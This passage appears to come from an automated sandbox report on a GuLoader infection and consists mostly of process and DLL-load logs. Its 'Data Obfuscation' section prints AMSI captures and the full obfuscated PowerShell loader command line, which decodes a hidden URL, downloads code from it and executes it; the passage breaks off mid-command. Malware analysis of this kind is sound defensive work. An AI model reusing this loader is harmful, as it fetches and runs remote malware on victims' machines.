              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: ore.pdb source: powershell.exe, 0000000A.00000002.1615492654.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 0000000A.00000002.1643140338.0000000006FA3000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("Powershell.exe", "" <#Italomania strangulations drhammern", "", "", "0");
              Yara detected GuLoader
              Source: Yara matchFile source: 0000000A.00000002.1653381480.0000000008BD7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1653204525.00000000083F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1635429037.0000000005943000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1441853777.000001B5E4687000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64string($Phonically)$gLOBAL:mlkEgRuPPErs59 = [systEM.text.ENCOdIng]::ascIi.gEtstRIng($konsiGnerEDes)$GLObAL:sinCIpiTa=$MLKEgrUpPeRs59.subsTRINg($mATegRIFfon,$TResseN)<#Micronesian Mrkegul Tra
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Minervan $despicable $Urocyst), (Unrecalling @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Fivepenny = [AppDomain]::CurrentDomain.GetAssemblies()$global:
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Pinkies114)), $Kunstgdningsfabrikkers).DefineDynamicModule($stereophonically, $false).DefineType($Hackler, $tewer, [System.MulticastDe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64string($Phonically)$gLOBAL:mlkEgRuPPErs59 = [systEM.text.ENCOdIng]::ascIi.gEtstRIng($konsiGnerEDes)$GLObAL:sinCIpiTa=$MLKEgrUpPeRs59.subsTRINg($mATegRIFfon,$TResseN)<#Micronesian Mrkegul Tra
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Italomania strangulations drhammernes Waldglas #>;$Visualist='Aktivitetspdagogikkens';<#Castilianskes Celleforskning slobbish Malakon Nedjusteres fyg reinterrupt #>;$startsymbols=$skjaldedigtets+$host.UI;If ($startsymbols) {$Amatrskuespillerne++;}function Fanebrere($Visceroskeletal){$salgsvarerne=$Menazons+$Visceroskeletal.'Length'-$Amatrskuespillerne; for( $Overcommited=3;$Overcommited -lt $salgsvarerne;$Overcommited+=4){$Procentdels++;$stikbrevenes+=$Visceroskeletal[$Overcommited];$outparagon='Dermatologies';}$stikbrevenes;}function Halvraaddent($Landskatterets){ & ($Jamredes) ($Landskatterets);}$successionernes=Fanebrere 'PhoM aroFarzBruiNonlMyol suaTri/ P, ';$successionernes+=Fanebrere ',al5 In.Rai0st Gk( aWs eiskinPandKvio liwRidsEm KolN nkTGru Km1 la0F n.sht0Mot;Ele HypWUtriMesn sn6s,i4 o; Ma OplxGla6Fer4Uun;Grf .arPnevRec:Red1Per3Cra1sc . G,0 so) .a RidGFlieVogcEjek UdoVol/ on2Ce 0rip1Und0 Ac0 Io1 Co0s,u1 el EstFUnci InrDireJugf mpo Rex Bo/non1Akt3,hu1 i.Di 0I,t ';$Pengehistorier=Fanebrere 'VaaUFrisHu.E ewRApo-FolALibGp.cEExsn riTsul ';$Ooziness=Fanebrere 'CochFort sut sep,re:Cam/Res/foulTinn.nt6Re bRas9 De. A.s unhsp.os mp,or/ trePolOEntYFlaLHe pRkeCGr y doFAfr/ taPTebaT.eastesIm kse,n ,knsreePedlKassLoneswosFin. iuFar3 pr2Mot ';$Casbah=Fanebrere 'Pre>non ';$Jamredes=Fanebrere ' skispiE dsX Ma ';$Reagitation='Intertrace';$Jvningers='\Foregrib.ses';Halvraaddent (Fanebrere ' B,$Mi.gZo,L omOCloBr tATakLPar: agiPronsliDResyaf lkegi stcGra=Ur.$Le E rinslav ro:UnsAOpipFlgpVapDAl aspet ReaRap+gla$st,jChlvVisNgali raNCaeGOpde riRpuns D, ');Halvraaddent (Fanebrere ' De$EpiGVanLsprOC oBkomAFooLHoi:Bo,p orYPr.rNagh.tvERatLO.rIGynoRgem s ETittComECheRmo.s Bo=sa $ActOstaop.kz .rI l nZi e VisU ssPar. .rssprP LaL T.IKreTPro(Bes$smocForA HusU nB llAUndHslo) o ');Halvraaddent (Fanebrere 'sma[ sknExoeGentUnd.UntsBileBilrKrovstrI D CR se RnPN,kO LiiDisnEn tPauMbisa Esn TeA RogRioeGrarBis]K.n:Non:stassubestrcIn UFrer FaiEjetTany LiPAlbR,arOs etpq,oC.bC MoOslolRac Pro=A.e P c[ Unn .reA btUna. MasTroes bcsupu imrslyi.ertTraYChupProRA sOBarTU so.itCB toTu lselTassY HaPDriEApl]For: K :Unitembl LasUni1unm2 Uf ');$Ooziness=$Pyrheliometers[0];$Bouw=(Fanebrere 'B y$forgUoplstooA dBGisA uaLU.c:CreTAn uTorrHe bEthOMatTbacsMok= N NPoleRatWski- s.Oskab spJEjeeCouCGodtAtr Tegs BayFlosIritBisE ukMsni. OvnFluePsyTVul.CypW C,EBarbp,cC K l doiUncE ArNO tT.oo ');Halvraaddent ($Bouw);Halvraaddent (Fanebrere 'Rag$UnfTsphuUndrspib .noIn tT.xs Fo.Pr HE.iebefaProd.are udrPhys Ki[Pla$ProP RseUndnDefgUnreForhCari Buss.mts eo Efr Uli QueJu.rBer]Far= Th$R,lsElausubcKo csasesess sas nei ,ioPu,nErse atrKnsnspeePapsKh, ');$Ondskabsfuldhed29=Fanebrere ' Fl$Fo T KouRdsr hbMacocyntDagsIn..E kDsk,o R wF rn Pel ykos ta ,ldLitFFreiIm lB heOrr(Tro$IveOMoposliz H,igrun Bae ulsKnosKal,sla$Ex T arDigkCroaAgggH resqurP,esAfv)Til ';$Trkagers=$Indylic;Halvraadde
